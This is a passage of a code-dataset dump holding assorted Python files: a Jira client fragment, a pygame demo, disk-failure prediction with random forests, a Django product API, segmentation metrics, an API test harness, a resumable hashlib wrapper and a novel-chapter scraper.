request_json)\n status = response.status_code\n text = response.text\n self._jira_logger.log(status, text, request_json)\n if status != 200:\n self._exception_handler.raise_exception(status, text, request_json)\n return response.json\n \n\n \n \n","sub_path":"jira/jira_issue.py","file_name":"jira_issue.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"534595685","text":"import sys\nimport pygame\nfrom pygame.locals import QUIT\nimport random\n\npygame.init()\nWIDTH = 640\nHEIGHT = 480\nWSIZE = (WIDTH, HEIGHT)\nsurface = pygame.display.set_mode( WSIZE )\npygame.display.set_caption( 'Squash' )\nclock = pygame.time.Clock()\nFPS = 2\n\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nCYAN = (0,255,255)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nCOLORS = [RED, GREEN, BLUE,\\\n YELLOW, CYAN, MAGENTA, WHITE, BLACK]\n\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n n = random.randint( 0, 7 )\n surface.fill( COLORS[n] )\n pygame.display.update()\n clock.tick( FPS )\n","sub_path":"book2/programs/python/pg02.py","file_name":"pg02.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301628093","text":"import matplotlib.dates as mdates\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nclass RainfallSeries:\r\n def __init__(self, db_tools):\r\n self._db_tools = db_tools\r\n\r\n def rainfall_serie(self, position):\r\n result = self._db_tools.select_all(\r\n \"SELECT read_dates.date_hour, precipitations.rainfall FROM public.read_dates, public.precipitations WHERE precipitations.read_date_id = read_dates.id AND precipitations.position_id = %s ORDER BY read_dates.date_hour ASC\",\r\n (position,))\r\n\r\n dates_series = []\r\n values_series = []\r\n for dt in result:\r\n dates_series.append(dt[0])\r\n values_series.append(dt[1])\r\n return dates_series, values_series\r\n\r\n def plot_graph(self, dates_series, values_series, r, c):\r\n plt.clf()\r\n plt.ylim((0, 1))\r\n plt.plot(dates_series, values_series, linewidth=1)\r\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y %H:%M'))\r\n # plt.gca().xaxis.set_major_locator(mdates.HourLocator())\r\n plt.xlabel('Data/Hora')\r\n plt.ylabel('Precipitacao')\r\n plt.title('Serie')\r\n plt.gcf().autofmt_xdate()\r\n plt.grid()\r\n # plt.show()\r\n plt.savefig(\"graficos/serie_\" + str(r) + \"X\" + str(c) + \".png\")\r\n\r\n def normalized(self, v):\r\n norm = np.linalg.norm(v, ord=1)\r\n if norm == 0:\r\n norm = np.finfo(v.dtype).eps\r\n return v / norm\r\n","sub_path":"rainfall_series.py","file_name":"rainfall_series.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"124926481","text":"import json\nfrom products.models import Category, Product\nfrom api.serializers import serialize_product_as_json\n\nfrom django.views.generic import View\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_list_or_404, get_object_or_404\n\n# complete the View below with all REST functionality\n\nclass ProductView(View):\n\n def get(self, *args, **kwargs):\n data = None\n\n product_id = kwargs.get('product_id')\n if product_id:\n product = get_object_or_404(Product, id=product_id)\n data = serialize_product_as_json(product)\n else:\n products = get_list_or_404(Product)\n data = [serialize_product_as_json(product) for product in products]\n\n return JsonResponse(data, status=200, safe=False)\n\n def post(self, *args, **kwargs):\n data = json.loads(self.request.body)\n category_id = data.get('category', None)\n category = get_object_or_404(Category, id=category_id)\n product = Product.objects.create(\n name=data.get('name'),\n sku=data.get('sku'),\n category=category,\n description=data.get('description'),\n price = data.get('price')\n )\n data = serialize_product_as_json(product)\n return JsonResponse(data, status=201, safe=False)\n\n def delete(self, *args, **kwargs):\n product_id = kwargs.get('product_id')\n product = get_object_or_404(Product, id=product_id)\n product.delete()\n data = {\"success\": True}\n return JsonResponse(data, status=204, safe=False)\n\n def patch(self, *args, **kwargs):\n product_id = kwargs.get('product_id')\n product = get_object_or_404(Product, id=product_id)\n data = json.loads(self.request.body)\n\n for field in ['name', 'category', 'sku', 'description', 'price', 'featured']:\n if not field in data:\n continue\n\n if field == 'category':\n data['category'] = get_object_or_404(Category, id=data.get('category'))\n\n setattr(product, field, data[field])\n product.save()\n\n data = serialize_product_as_json(product)\n return JsonResponse(data, status=200, safe=False)\n\n def put(self, *args, **kwargs):\n product_id = kwargs.get('product_id')\n product = get_object_or_404(Product, id=product_id)\n data = json.loads(self.request.body)\n\n for field in ['name', 'category', 'sku', 'description', 'price', 'featured']:\n if not field in data:\n return JsonResponse({'success': False}, status=404)\n\n if field == 'category':\n data['category'] = get_object_or_404(Category, id=data.get('category'))\n\n setattr(product, field, data[field])\n product.save()\n\n data = serialize_product_as_json(product)\n return JsonResponse(data, status=200, safe=False)\n","sub_path":"ecommerce/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"285159207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 22 19:35:47 2019\n\n@author: masudulhasanmasudb\n\"\"\"\nimport time\nimport glob,random\nimport datetime\nimport os\nimport subprocess\nimport shlex\nimport gc\nimport pandas as pd\nimport collections\nimport numpy as np\nimport pandas as pd\n#import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, metrics \nimport gc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom imblearn.over_sampling import (RandomOverSampler, SMOTE, ADASYN)\nfrom collections import Counter\nimport sys, traceback\nimport threading\nimport datetime\n\n#disk_model_name = \"ST4000DM000\"\n#disk_model_name = \"ST8000DM002\"\n#disk_model_name = \"ST8000NM0055\"\ndisk_model_name = \"ST12000NM0007\"\n#disk_model_name = \"ST6000DX000\" //error\n#disk_model_name = \"ST10000NM0086\" //error\n\nnumber_of_days = 1\n\nmap_list = []\nindex_map ={}\ndate_dict={}\nnow = time.time()\ncount=-1\nfile_name=\"\"\nwith open(\"../map_2019.txt\",\"r\")as in_file:\n for line in in_file:\n if(len(line.strip())>0):\n if\".csv\" in line:\n if(count!=-1):\n map_list.append(date_dict)\n index_map[file_name]=count\n \n date_dict.clear()\n count+=1\n file_name=line.strip()\n else:\n parts = line.strip().split(\" \")\n date_dict[parts[0]] = int(float(parts[1]))\n \n# print(line)\n \n \nprint(count)\n\ndef perf_measure(y_actual, y_hat):\n TP = 0\n FP = 0\n TN = 0\n FN = 0\n\n for i in range(len(y_hat)): \n if y_actual[i]==y_hat[i]==1:\n TP += 1\n if y_hat[i]==1 and y_actual[i]!=y_hat[i]:\n FP += 1\n if y_actual[i]==y_hat[i]==0:\n TN += 1\n if y_hat[i]==0 and y_actual[i]!=y_hat[i]:\n FN += 1\n \n return(TP, FP, TN, FN)\n\ndef count_unique(keys):\n uniq_keys = np.unique(keys)\n bins = uniq_keys.searchsorted(keys)\n return uniq_keys, np.bincount(bins)\n\n\ndef get_lable(serial_number_list,date,year,month,day):\n global parent_folder_name\n next_day_label =[]\n \n now = datetime.datetime(year,month,day)\n next_day = (now + datetime.timedelta(days=1)).strftime('%Y-%m-%d')\n \n for x in serial_number_list:\n index = index_map[x+\".csv\"]\n current_value = map_list[index][date]\n \n next_day_value = map_list[index][next_day]\n \n if(current_value==next_day_value):\n next_day_label.append(0)\n else:\n next_day_label.append(1)\n \n return next_day_label\n \n\ndef Sort_Tuple(tup): \n return(sorted(tup, key = lambda x: x[0], reverse = True))\n\n\ndef calculate_accuracy(tuple_list, real_list):\n threshold_list = [0.5, 0.45, 0.4, 0.35, 0.3, 0.25, 0.2, 0.15, 0.1, 0.05, 0.04, 0.03, 0.02, 0.01, 0.0]\n \n final_string=\"\"\n \n for base_threshold in threshold_list:\n tp=0 \n tn=0\n fp=0\n fn=0\n for x in range(len(tuple_list)):\n item = tuple_list[x]\n prob = float(item[0])\n# print(prob)\n# print(real_list[x])\n# print(item[1])\n# print(base_threshold)\n if prob >= base_threshold:\n if real_list[x]==1:\n tp+=1\n else:\n fp+=1\n else:\n if item[1]== 1 and real_list[x]==1:\n tp+=1\n elif item[1]== 0 and real_list[x]==1:\n fn+=1\n \n elif item[1]== 0 and real_list[x]==0:\n tn+=1\n elif item[1]== 1 and real_list[x]==0:\n fp+=1\n \n# print(\"TP, FP, TN, FN = \"+str(tp)+\" \"+str(fp)+\" \"+str(tn)+\" \"+str(fn))\n\n final_string+=\"\\n\\nThreshold \"+str(base_threshold)+\"\\n\"\n final_string+=\"TP, FP, TN, FN = \"+str(tp)+\" \"+str(fp)+\" \"+str(tn)+\" \"+str(fn)+\"\\n\"\n try:\n final_string+=\"Recall: \"+ str(tp/(tp+fn))+\"\\n\"\n except:\n final_string+=\"Recall: \"+ str(0)+\"\\n\"\n try:\n final_string+=\"extra: \"+ str((fp/(tn+fp))*100)+\"\\n\"\n except:\n final_string+=\"extra: \"+ str(0)+\"\\n\"\n return final_string\n \nselected_models = ['ST4000DM000', 'ST8000DM002', 'ST12000NM0007', 'ST8000NM0055', 'ST3000DM001', 'ST4000DX000']\n\nfor disk_model_name in selected_models:\n\n hdd = pd.read_csv(\"../final_dataset/\"+str(number_of_days)+'/'+str(disk_model_name)+'.csv', header=None)\n #hdd = pd.read_csv(\"../dataset_1.csv\")\n hdd = hdd.drop(hdd.columns[6], axis=1)\n hdd = hdd.drop(hdd.columns[9], axis=1)\n hdd = hdd.drop(hdd.columns[14], axis=1)\n hdd = hdd.drop(hdd.columns[13], axis=1)\n hdd = hdd.dropna()\n# print(hdd.head())\n \n hdd_extra = pd.read_csv(\"../2019_files/\"+str(number_of_days)+'/'+str(disk_model_name)+'.csv', header=None)\n# print(hdd_extra.head())\n hdd_extra = hdd_extra.drop(hdd_extra.columns[6], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[9], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[14], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[13], axis=1)\n hdd_extra = hdd_extra.dropna()\n \n hdd_merged = [hdd, hdd_extra]\n result = pd.concat(hdd_merged)\n# print(result.head())\n #result = result.dropna()\n \n x = result.iloc[:, :-1].values\n y = result.iloc[:, -1].values\n \n from imblearn.under_sampling import RandomUnderSampler\n rus = RandomUnderSampler()\n \n del hdd\n del hdd_extra\n del hdd_merged\n del result\n gc.collect()\n \n X_resampled, y_resampled = rus.fit_resample(x, y)\n print(Counter(y_resampled))\n# X_train, X_test, y_train, y_test = train_test_split(X_resampled, y_resampled, test_size=0.1, random_state=42)\n clf=RandomForestClassifier()\n clf.fit(X_resampled,y_resampled)\n \n \n features = [1, 4, 5, 7, 9, 12, 188, 193, 194, 197, 198, 199]\n columns_specified = []\n for feature in features:\n \tcolumns_specified += [\"smart_{0}_raw\".format(feature)]\n \n stripe_size = 50\n \n output_file = open(\"../result_log/\"+str(disk_model_name)+\".txt\",\"a+\")\n ##\n year = 2019\n end_year = 2019\n while year<=end_year: \n for month in range(7,8):\n for day in range(1,16):\n if month<=9:\n month_str = \"0\"+str(month)\n else:\n month_str = str(month)\n \n if day<=9:\n day_str = \"0\"+str(day)\n else:\n day_str = str(day)\n \n correctDate = None\n try:\n newDate = datetime.datetime(year,month,day)\n correctDate = True\n except ValueError:\n correctDate = False\n if correctDate==True:\n try:\n date = str(year)+\"-\"+month_str+\"-\"+day_str\n print(date)\n df = pd.read_csv(\"../data/\"+date+\".csv\")\n # df = df.loc[df['model'] == 'ST4000DM000']\n df = df.loc[df['model'] == str(disk_model_name)]\n df = df.loc[df['serial_number'] !=\"S300XQ5W\"]\n df = df.loc[df['serial_number'] !=\"W0Q7D8BD\"]\n df = df.loc[df['serial_number'] !=\"W3004WHH\"]\n shape = df.shape\n if shape[0]!=0:\n total_disk_number = 0\n total_check_disk = 0\n wl = np.random.poisson(lam=1.123983e+05)\n print(wl)\n output_str =\"\"\n for numof_iter in range(wl):\n try:\n s = np.random.uniform(0,1)\n if s>.9:\n file_size = np.random.poisson(lam=1.165580e+07)\n else:\n file_size = np.random.poisson(lam=2.082032e+01)\n \n output_str += \"\\n\\nfile size \"+ str(file_size)+\"\\n\"\n disk_number = int((file_size/1024)/50)+1\n \n if(disk_number> shape[0]):\n selected_disk = df\n total_disk_number+=shape[0]\n else:\n selected_disk = df.sample(disk_number)\n total_disk_number+=disk_number\n \n serial_number = selected_disk.iloc[:, 1].values\n selected_disk = selected_disk[columns_specified]\n pred_value = clf.predict(selected_disk)\n preds = clf.predict_proba(selected_disk)\n predicted_pair_list = []\n \n for x in range(len(preds[:,1])):\n predicted_pair_list.append((preds[:,1][x],pred_value[x]))\n \n # print(predicted_pair_list)\n \n # s_list = Sort_Tuple(predicted_pair_list)\n \n output_str+=str(date)+\"\\n\"\n # output_str+=\"predicted_value: \\n\"\n # output_str+=str(pred_value) + \"\\n\" \n next_day_label = get_lable(serial_number,date,year,month,day)\n \n # output_str+=\"next day real value: \\n\"\n # output_str+=str(next_day_label)+\"\\n\"\n \n output_str+=calculate_accuracy(predicted_pair_list, next_day_label)\n # c_auuracy, checksum_disk = calculate_accuracy(s_list, next_day_label)\n # total_check_disk+=int(checksum_disk)\n # \n # output_str += \"self calculated accuracy \"+ c_auuracy+\"\\n\"\n # output_str += \"cheksem run on \"+ checksum_disk +\"\\n\"\n # TP, FP, TN, FN = perf_measure(next_day_label, pred_value)\n # output_str+=\"next day stat: \\n\"\n # output_str+= str(metrics.accuracy_score(next_day_label, pred_value))+\"\\n\"\n # output_str+=str(metrics.recall_score(next_day_label, pred_value))+\"\\n\"\n # output_str+=\"TP: \"+str(TP)+\" \"+str(FP)+\" \"+str(TN)+\" \"+str(FN)+\"\\n\"\n \n except:\n # print(\"error\")\n traceback.print_exc()\n \n output_file.write(output_str)\n # output_file.write(\"total_disk \"+ str(total_disk_number) +\"\\n\")\n # output_file.write(\"check Sum run on \"+ str(total_check_disk) +\"\\n\")\n # output_file.write(\"perct \"+ str(total_check_disk/total_disk_number) +\"\\n\")\n output_file.flush()\n del(df)\n gc.collect()\n except:\n traceback.print_exc()\n \n \n year+=1 \n","sub_path":"scripts/simulation_wih_real_distribution.py","file_name":"simulation_wih_real_distribution.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"137902613","text":"from dk_metric import image_metrics\nimport os\nfrom multiprocessing import Process, Lock, Manager\nimport numpy as np\nimport time\nimport sys\n\n'''python3 main.py gt_folder pre_folder output_folder [optional startt endt stepsize]'''\n\ngt_folder = sys.argv[1]\nprop_folder = sys.argv[2]\noutput_csv = os.path.join(sys.argv[3], 'scores.csv')\n\nstartt, endt, stepsize = 0.05, 0.95, 0.01\nif len(sys.argv) > 4:\n startt, endt, stepsize = list(map(float, sys.argv[4:]))\n\n\nradius = 3\nThread_Cnt = 16\nfiles = os.listdir(prop_folder)\nlock = Lock()\n\nALL_thresholds = []\nALL_precision, ALL_recall, ALL_F1, ALL_Jaccard, ALL_mod_prec, ALL_mod_recall, ALL_mod_F1 = [],[],[],[],[],[],[]\nmanager = Manager()\n\ndef cal_fp_tp(files, l, threshold):\n # sTP, sFP, sFN, msTP, msFP, msFN\n start_time = time.time()\n sTP, sFP, sFN, msTP, msFP, msFN = 0, 0, 0, 0, 0, 0\n for i, f in enumerate(files):\n gt_path = os.path.join(gt_folder, f.replace('_row', '_label'))\n prop_path = os.path.join(prop_folder, f)\n # gt_path = os.path.join(gt_folder, f)\n # prop_path = os.path.join(prop_folder, f)\n if i != 0 and i % 200 == 0:\n print(os.getpid(), i, 'th file... use', time.time() - start_time, 'seconds.')\n\n TP, FP, FN = image_metrics.get_TP_FP_FN(gt_path, prop_path, threshold=threshold)\n mTP, mFP, mFN = image_metrics.get_mod_TP_FP_FN(gt_path, prop_path, radius=radius, threshold=threshold)\n sTP += TP\n sFP += FP\n sFN += FN\n msTP += mTP\n msFP += mFP\n msFN += mFN\n with lock:\n l[0] += sTP\n l[1] += sFP\n l[2] += sFN\n l[3] += msTP\n l[4] += msFP\n l[5] += msFN\n\n\nthresholds = np.arange(startt, endt, stepsize).tolist()\nfor threshold in thresholds:\n ALL_thresholds.append(threshold)\n print('-------------', threshold, '-------------')\n threshold *= 255\n l = manager.list([0, 0, 0, 0, 0, 0])\n\n pool = []\n files_threads = np.array_split(files, Thread_Cnt)\n\n for i in range(Thread_Cnt):\n pool.append(Process(target=cal_fp_tp, args=(files_threads[i].tolist(), l, threshold,)))\n for t in pool:\n t.start()\n for t in pool:\n t.join()\n\n sTP, sFP, sFN, msTP, msFP, msFN = list(l)\n Precision = sTP / (sTP + sFP) if (sTP + sFP != 0) else 1\n Recall = sTP / (sTP + sFN) if(sTP + sFN != 0) else 1\n\n Jaccard = 1 / (1/Precision + 1/Recall - 1) if (Precision > 0 and Recall > 0) else 0\n F1 = 2 * Precision * Recall / (Precision + Recall) if (Precision > 0 and Recall > 0) else 0\n \n ALL_precision.append(Precision)\n ALL_recall.append(Recall)\n ALL_Jaccard.append(Jaccard)\n ALL_F1.append(F1)\n\n mPrecision = msTP / (msTP + msFP) if (msTP + msFP != 0) else 1\n mRecall = msTP / (msTP + msFN) if(msTP + msFN != 0) else 1\n mF1 = 2 * mPrecision * mRecall / (mPrecision + mRecall) if (mPrecision > 0 and mRecall > 0) else 0\n\n ALL_mod_prec.append(mPrecision)\n ALL_mod_recall.append(mRecall)\n ALL_mod_F1.append(mF1)\n \n\nwith open(output_csv, 'w') as output:\n data_thre = 'Threshold,' + ','.join(['{:.6f}'.format(v) for v in ALL_thresholds])\n data_pre = 'Precision,' + ','.join(['{:.6f}'.format(v) for v in ALL_precision])\n data_rec = 'Recall,' + ','.join(['{:.6f}'.format(v) for v in ALL_recall])\n data_jac = 'Jaccard,' + ','.join(['{:.6f}'.format(v) for v in ALL_Jaccard])\n data_f1 = 'F1,' + ','.join(['{:.6f}'.format(v) for v in ALL_F1])\n data_mpre = 'Mod_Prec,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_prec])\n data_mrec = 'Mod_Rec,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_recall]) \n data_mf1 = 'Mod_F1,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_F1])\n output.write('\\n'.join([data_thre, data_pre, data_rec, data_jac, data_f1, data_mpre, data_mrec, data_mf1])) \n\n","sub_path":"ComputeScore/main_180405.py","file_name":"main_180405.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"183270871","text":"#! /usr/bin/env python\nfrom pandas import concat\nimport re\nimport sys, os\nfrom poplerGUI.logiclayer.datalayer import config as orm\nfrom poplerGUI.logiclayer import class_userfacade as face\nfrom poplerGUI.logiclayer import class_timeparse as tparse\nfrom poplerGUI.logiclayer.class_helpers import produce_null_df\nfrom poplerGUI.logiclayer import class_dictionarydataframe as ddf\n\ndef test_site_in_project_key(\n MergeToUpload, site_handle_corner_case, file_handle_corner_case,\n meta_handle_corner_case, project_handle_corner_case, taxa_handle_corner_case,\n time_handle_corner_case, count_handle_corner_case, covar_handle_corner_case):\n facade = face.Facade()\n\n facade.input_register(meta_handle_corner_case)\n facade.meta_verify()\n\n facade.input_register(file_handle_corner_case)\n facade.load_data()\n facade._data.replace({'-888': 'NA'}, inplace=True)\n\n \n facade.input_register(site_handle_corner_case)\n sitedirector = facade.make_table('siteinfo')\n study_site_table = sitedirector._availdf\n\n print('study_site_table (test): ', study_site_table)\n facade.create_log_record('study_site_table')\n lter = meta_handle_corner_case.lnedentry['lter']\n ltercol = produce_null_df(1, [\n 'lter_table_fkey'], len(study_site_table), lter)\n study_site_table = concat([study_site_table, ltercol], axis=1)\n print('study_site_table: ', study_site_table)\n facade.push_tables['study_site_table'] = study_site_table\n \n siteid = site_handle_corner_case.lnedentry['study_site_key']\n sitelevels = facade._data[\n siteid].drop_duplicates().values.tolist()\n facade.register_site_levels(sitelevels)\n facade._valueregister['siteid'] = siteid\n\n facade.input_register(project_handle_corner_case)\n maindirector = facade.make_table('maininfo')\n project_table = maindirector._availdf.copy().reset_index(drop=True)\n orm.convert_types(project_table, orm.project_types)\n \n facade.push_tables['project_table'] = project_table\n facade.create_log_record('project_table')\n \n facade.input_register(taxa_handle_corner_case)\n taxadirector = facade.make_table('taxainfo')\n taxa_table = taxadirector._availdf\n facade.push_tables['taxa_table'] = taxa_table\n facade.create_log_record('taxa_table')\n \n facade.input_register(time_handle_corner_case)\n timetable = tparse.TimeParse(\n facade._data, time_handle_corner_case.lnedentry).formater()\n facade.push_tables['timetable'] = timetable\n facade.create_log_record('timetable')\n\n facade.input_register(count_handle_corner_case)\n rawdirector = facade.make_table('rawinfo')\n rawtable = rawdirector._availdf\n print(rawtable)\n facade.push_tables[count_handle_corner_case.tablename] = rawtable\n facade.create_log_record(count_handle_corner_case.tablename)\n\n facade.input_register(covar_handle_corner_case)\n covartable = ddf.DictionaryDataframe(\n facade._data,\n covar_handle_corner_case.lnedentry['columns']).convert_records()\n facade.push_tables['covariates'] = covartable\n facade.create_log_record('covartable')\n\n facade._valueregister['globalid'] = meta_handle_corner_case.lnedentry['globalid']\n facade._valueregister['lter'] = meta_handle_corner_case.lnedentry['lter']\n facade._valueregister['siteid'] = siteid\n\n timetable_og_cols = timetable.columns.values.tolist()\n timetable.columns = [x+'_derived' for x in timetable_og_cols]\n observationdf = facade._data\n observation_time_df = concat([timetable,observationdf], axis=1 )\n \n print('merge class obs_time columns: ', observation_time_df.columns)\n print('merge class project table: ', project_table)\n\n try:\n study_site_table.to_sql(\n 'study_site_table',\n orm.conn, if_exists='append', index=False)\n except Exception as e:\n print(str(e))\n\n project_table['lter_project_fkey'] = facade._valueregister['lter']\n project_table.to_sql(\n 'project_table', orm.conn,\n if_exists='append', index=False\n )\n\n merge_object = MergeToUpload()\n site_in_project_key_df = merge_object.site_in_proj_key_df(\n studysitetabledf=study_site_table,\n projecttabledf=project_table,\n observationtabledf=observation_time_df,\n lterlocation= facade._valueregister['lter'],\n studysitelabel=siteid,\n studysitelevels=sitelevels\n )\n\n merge_object.merge_for_taxa_table_upload(\n formated_taxa_table=taxa_table,\n siteinprojkeydf=site_in_project_key_df,\n sitelabel=siteid\n )\n\n taxa_column_in_data = [\n x[1] for x in \n list(facade._inputs['taxainfo'].lnedentry.items())\n ]\n\n taxa_column_in_push_table = [\n x[0] for x in \n list(facade._inputs['taxainfo'].lnedentry.items())\n ]\n\n merge_object.merge_for_datatype_table_upload(\n raw_dataframe=observation_time_df,\n formated_dataframe=rawtable,\n formated_dataframe_name=\n '{}'.format(\n re.sub('_table', '', facade._inputs['rawinfo'].tablename)),\n covariate_dataframe = covartable,\n siteinprojkeydf=site_in_project_key_df,\n raw_data_taxa_columns=taxa_column_in_data,\n uploaded_taxa_columns=taxa_column_in_push_table\n )\n obs_columns_in_data = [\n x[1] for x in \n list(facade._inputs['rawinfo'].lnedentry.items())\n ]\n obs_columns_in_push_table = [\n x[0] for x in \n list(facade._inputs['rawinfo'].lnedentry.items())\n ]\n merge_object.update_project_table(\n spatial_rep_columns_from_og_df=obs_columns_in_data,\n spatial_rep_columns_from_formated_df=obs_columns_in_push_table\n )\n\n","sub_path":"test/logiclayer/test_mergedtoupload_count.py","file_name":"test_mergedtoupload_count.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"224160472","text":"# -*- coding: utf-8 -*-\nimport allure\nimport pytest\nfrom bin.unit import Request, Assert, Log\nfrom flow.Getjson import get_data\n\n\n# class test_single(object):\n# def setup_class(self):\n# # 做登录,初始化数据等\n# print('test start')\n# pass\n#\n# def teardown_class(self):\n# # 做清数据,退出登录等\n# print('test end')\n# pass\n\n\n@pytest.mark.parametrize(\"url,method,body\", get_data())\n@allure.epic('CDN客户控制台接口测试')\n@allure.feature('单一接口测试')\ndef test_one(url, method, body):\n # file_list = walkfile('/testcases')\n allure.testcase(url)\n request = Request.Request()\n asset = Assert.Assert()\n # log = Log.Log()\n if method == 'POST':\n response = request.post_request(url, body)\n allure.step('接口返回:' + str(response))\n assert response['code'] == '200'\n assert response['time_total'] < 3000\n asset.common_assert(response)\n # assert 1\n elif method == 'GET':\n response = request.get_request(url, body)\n allure.step('接口返回:' + str(response))\n assert response['code'] == '200'\n assert response['time_total'] < 3000\n # assert 1\n else:\n print('Method is unvalide')\n # log.info('Method is unvalide')\n allure.step('接口返回:' + 'Method is unvalide')\n # assert 1\n\n\ndef test_two():\n assert 1\n# if __name__ == '__main__':\n# aa = test_single.get_data()\n","sub_path":"autoTest/flow/test_flow.py","file_name":"test_flow.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"109015087","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os, sys, hashlib, base64, zlib\nfrom ctypes import cast, memmove, POINTER, c_void_p\nfrom .structs import EVPobject\n\nopaque_repr = False\n\nclass ResumableHasher(object):\n name = None\n _algorithms_guaranteed = getattr(hashlib,\n \"algorithms_guaranteed\",\n [\"md5\", \"sha1\", \"sha224\", \"sha256\", \"sha384\", \"sha512\"])\n\n def __init__(self, name=None, data=None, state=None):\n if state is not None:\n if not self.name:\n raise Exception('Parameter \"name\" is required')\n self.__setstate__(state=dict(name=name, md_data=zlib.decompress(base64.b64decode(state))))\n if data is not None:\n self.update(data)\n return\n if self.name is not None:\n data = name\n else:\n self.name = name\n if not self.name:\n raise Exception('Parameter \"name\" is required')\n hasher_args = [] if data is None else [data]\n self._hasher = self._get_hashlib_hasher(self.name)(*hasher_args)\n\n def _get_hashlib_hasher(self, name):\n if name.startswith(\"blake2\"):\n raise Exception(\"blake2 algorithms are not OpenSSL-based and not supported by rehash\")\n if name.startswith(\"sha3\"):\n raise Exception(\"sha3 algorithms are not supported by rehash\")\n if name.startswith(\"shake\"):\n raise Exception(\"shake algorithms are not supported by rehash\")\n if name in self._algorithms_guaranteed:\n return getattr(hashlib, name)\n else:\n return hashlib.new(name)\n\n def _get_evp_md_ctx(self):\n c_evp_obj = cast(c_void_p(id(self._hasher)), POINTER(EVPobject))\n if hasattr(c_evp_obj.contents.ctx, \"contents\"):\n return c_evp_obj.contents.ctx.contents\n else:\n return c_evp_obj.contents.ctx\n\n def __getstate__(self):\n ctx = self._get_evp_md_ctx()\n ctx_size = ctx.digest.contents.ctx_size\n hasher_state = ctx.md_data[:ctx_size]\n return dict(name=self.name, md_data=hasher_state)\n\n def __setstate__(self, state):\n self.name = state[\"name\"]\n self._hasher = self._get_hashlib_hasher(self.name)()\n ctx = self._get_evp_md_ctx()\n ctx_size = ctx.digest.contents.ctx_size\n memmove(ctx.md_data, state[\"md_data\"], ctx_size)\n\n def __getattr__(self, a):\n return getattr(self._hasher, a)\n\n def __repr__(self):\n if opaque_repr:\n return \"{}.{}()\".format(self.__module__, self.__class__.__name__)\n else:\n md_data = base64.b64encode(zlib.compress(self.__getstate__()[\"md_data\"])).decode()\n return \"{}.{}(state='{}')\".format(self.__module__, self.name, md_data)\n\n\nnew = ResumableHasher\n\ndef _initialize():\n module = sys.modules[__name__]\n for name in ResumableHasher._algorithms_guaranteed:\n if name.startswith(\"blake2\") or name.startswith(\"sha3\") or name.startswith(\"shake\"):\n continue\n setattr(module, name, type(name, (ResumableHasher,), dict(name=name)))\n\n\n_initialize()\n","sub_path":"rehash/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"167805391","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom spider import redis\nfrom spider import settings\nimport os\nimport re\nimport time\nfrom spider.items import ZonghengChapterDetail\n\n\nclass DetailspiderSpider(scrapy.Spider):\n name = \"detailspider\"\n allowed_domains = [\"zongheng.com\"]\n\n # start_urls = ['http://zongheng.com/']\n\n def __init__(self, name=None, **kwargs):\n super().__init__(name, **kwargs)\n links = redis.redisConnect.smembers(settings.CHAPTER_SET)\n if len(links) > 0:\n for link in links:\n self.start_urls.append(str(link, encoding='utf8'))\n\n def parse(self, response):\n url = response.url\n find = re.findall('\\d+', url)\n absPath = os.path.abspath('.') + '/book'\n bookDir = absPath + '/zh/' + str(find[0])\n bookChapterPath = absPath + '/zh/' + str(find[0]) + '/' + str(find[1]) + '.txt'\n bookChapterRelativePath = '/zh/' + str(find[0]) + '/' + str(find[1]) + '.txt'\n if not os.path.exists(bookDir):\n os.makedirs(bookDir)\n content = response.xpath(\"//div[@id='chapterContent']/p/text()\").extract()\n textNumber = response.xpath('//*[@id=\"uiContentPanel\"]/div[7]/span/em[2]/span/text()').extract()[0]\n textNumber = int(textNumber)\n updateTime = response.xpath('//*[@id=\"uiContentPanel\"]/div[7]/span/em[1]/span/text()').extract()[0]\n updateTime = time.mktime(time.strptime(updateTime, '%Y-%m-%d %H:%M:%S'))\n if len(content) > 0:\n f = open(bookChapterPath, 'a')\n f.write('')\n for text in content:\n f.write(text.strip() + '\\n')\n f.close()\n item = ZonghengChapterDetail()\n item['chapterPath'] = bookChapterRelativePath\n item['chapterTextNumber'] = textNumber\n item['updateAt'] = updateTime\n item['chapterHref'] = url\n yield 